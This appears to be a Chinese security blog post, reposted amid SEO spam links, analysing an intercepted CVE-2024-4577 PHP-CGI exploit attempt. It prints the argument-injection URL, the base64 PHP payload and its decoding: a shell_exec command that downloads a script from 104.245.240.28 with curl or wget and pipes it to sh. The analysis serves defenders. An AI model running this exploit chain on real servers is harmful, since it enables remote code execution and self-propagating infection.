当前位置: 首页 > wzjs >正文

企业网站建设开发注意事项软文推荐

企业网站建设开发注意事项,软文推荐,php租车网站,郑州做网站熊掌号一、分析数据包内容 攻击者通过URL请求POST传参的方式试图绕过IPS测试RCE漏洞的利用 URL请求中的内容进行urlcode解码后是这样的: http://资产IP/hello.world?-d allow_url_include1 -d auto_prepend_filephp://input 1. -d allow_url_include1: 使…

一、分析数据包内容

攻击者通过URL请求+POST传参的方式试图绕过IPS测试RCE漏洞的利用

URL请求中的内容进行urlcode解码后是这样的:

http://资产IP/hello.world?-d allow_url_include=1 -d auto_prepend_file=php://input
1. -d allow_url_include=1
  • 使用 PHP 的 -d 命令行参数,在执行时动态设置配置项
  • allow_url_include=1:启用从 URL 包含文件的功能,这通常在 php.ini 是禁用的。
  • 它允许 include() 或 require() 加载远程地址,如 http://attacker.com/shell.txt
2. -d auto_prepend_file=php://input
  • 这个设置使 PHP 在解析主脚本之前,自动包含一个文件
  • 这里指定的文件是 php://input,也就是HTTP 请求体(POST data)中的原始输入流
  • 也就是说可以直接包含POST中的数据并执行

然后再结合POST传递的内容分析:

请求体中的内容是:

<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzEwNC4yNDUuMjQwLjI4L3NoIHx8IHdnZXQgaHR0cDovL
zEwNC4yNDUuMjQwLjI4L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA=="));
echo(md5("Hello CVE-2024-4577")); ?>

其中base64字段解码后:

<?php shell_exec( X=$(curl http://104.245.240.28/sh || wget http://104.245.240.28/sh -O-); 
echo "$X" | sh -s cve_2024_4577.selfrep);echo(md5("Hello CVE-2024-4577")); ?>

这条命令的目的是利用远程代码执行漏洞(RCE)来从远程服务器下载一个脚本并执行它,而它特别指向了一个命名为 cve_2024_4577.selfrep 的 payload,表明攻击者试图利用 2024 年披露的某个 CVE(CVE-2024-4577)漏洞,进行进一步的自动传播或感染操作

二、判断攻击者的目的

1、通过GET参数-d开启allow_url_include=1和auto_prepend_file=php://input

        其目的是执行POST传递的数据流

2、POST注入恶意PHP脚本,内容为:

        使用shell_exec()执行shell命令

X=$(curl http://104.245.240.28/sh || wget http://104.245.240.28/sh -O-); echo "$X" | sh -s cve_2024_4577.selfrep

        通过curl或wget访问攻击者远程搭建的服务器中104.245.240.28中的sh文件

        把内容赋值给X

        将X的值通过管道符传递给靶机本地sh执行

        -s cve_2024_4577.selfrep 表明传递一个参数给脚本,脚本内部可能会根据这个参数执行

3、然后通过echo(md5("Hello CVE-2024-4577")); 输出一个hash,用于回显检测是否成功执行。

http://www.dtcms.com/wzjs/119336.html

相关文章:

  • 做网站的公司品牌策略包括哪些内容
  • 流量网站应该怎么做比较好的网站建设网站
  • 网站建设服务 百度直通车怎么开效果最佳
  • 优质的中小型网站建设外包公司是什么意思
  • 柳州网站设计如何推广一款app
  • 传智播客网站开发全套视频教程凡科建站多少钱
  • 美丽深圳公众号二维码原图成都优化官网公司
  • 信息网站建设方案拓客团队怎么联系
  • 模板手机网站建设公司排名市场调研报告1000字
  • django企业网站开发实例软文范例大全100字
  • wordpress特色图像插件seo优化一般多少钱
  • 如何开发一个视频网站网络优化大师下载
  • wordpress文章模板宁波seo推广
  • 网站终端制作网络营销策划的基本原则
  • 做京挑客的网站有哪些重庆森林在线观看
  • 专业企业网站建设报价品牌推广策划方案
  • php动态网站代做武汉网站排名提升
  • 正宗营销型网站建设种子搜索在线 引擎
  • 天津 做网站百度指数 移民
  • 怎么做安居客网站购物网站页面设计
  • 嘉定公司网站设计浏览器大全
  • 网站后台数据库管理精准防控高效处置
  • wordpress访问北京seo优化诊断
  • 易云巢做营销型网站seo排名怎么样
  • 无极领域付费网站google关键词排名
  • 教育主管部门建设的专题资源网站搜索引擎营销的方法有哪些
  • 网站建设公司西安沈阳关键词seo
  • 我想找阿里巴巴做网站推广销售方案怎么做
  • 计算机应用专业(网站开发)百度快照在哪里
  • 丹江口做网站如何选择种子搜索引擎torrentkitty